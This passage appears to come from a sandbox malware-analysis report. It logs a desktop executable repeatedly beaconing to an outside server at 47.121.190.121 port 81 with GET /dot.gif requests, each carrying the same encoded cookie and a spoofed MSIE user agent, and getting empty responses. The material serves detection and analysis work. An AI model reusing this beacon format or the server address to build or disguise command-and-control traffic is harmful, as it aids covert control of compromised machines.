              Date: Thu, 9 Jan 2025 17:29:05 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              110192.168.2.45011247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:05.286977053 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:06.251194000 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:06 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              111192.168.2.45011347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:06.375394106 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:07.326994896 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:07 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              112192.168.2.45011447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:07.458906889 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              113192.168.2.45011547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:11.564615965 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:12.553524017 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              114192.168.2.45011647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:12.676637888 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:13.618613958 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:13 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              115192.168.2.45011747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:13.734033108 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:14.716583014 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              116192.168.2.45011847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:14.851392031 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:15.814443111 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:15 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              117192.168.2.45011947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:15.937447071 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:16.893337965 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              118192.168.2.45012047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:17.018399954 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:18.004888058 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:17 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              119192.168.2.45012147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:18.125160933 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:19.163203955 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:19 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              120192.168.2.45012247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:19.284792900 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:20.243913889 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:20 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              121192.168.2.45012347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:20.358978987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:21.320697069 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:21 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              122192.168.2.45012447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:21.443793058 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:22.513612986 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:22 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              123192.168.2.45012547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:22.634139061 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:23.620271921 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:23 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              124192.168.2.45012647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:23.733658075 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:24.674144983 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:24 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              125192.168.2.45012747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:24.800683022 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:25.755846977 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:25 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              126192.168.2.45012847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:25.905774117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:26.889990091 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              127192.168.2.45012947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:27.000641108 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:27.972239971 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              128 | 192.168.2.4 | 50130 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:28.103682995 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:29.079829931 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:28 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              129 | 192.168.2.4 | 50131 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:29.204907894 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:30.159822941 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              130 | 192.168.2.4 | 50132 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:30.283030987 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:31.218389034 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:31 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              131 | 192.168.2.4 | 50133 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:31.327210903 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:32.268121004 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:32 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              132 | 192.168.2.4 | 50134 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:32.394855022 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:33.362567902 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:33 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              133 | 192.168.2.4 | 50135 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:33.483562946 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:34.426394939 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:34 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              134 | 192.168.2.4 | 50136 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:34.547451973 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:35.521070957 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:35 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              135 | 192.168.2.4 | 50137 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:35.651355982 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:36.597840071 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:36 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              136 | 192.168.2.4 | 50138 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:36.727013111 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:37.679876089 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:37 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              137 | 192.168.2.4 | 50139 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:37.796833038 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:38.792072058 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:38 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              138 | 192.168.2.4 | 50140 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:38.908732891 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
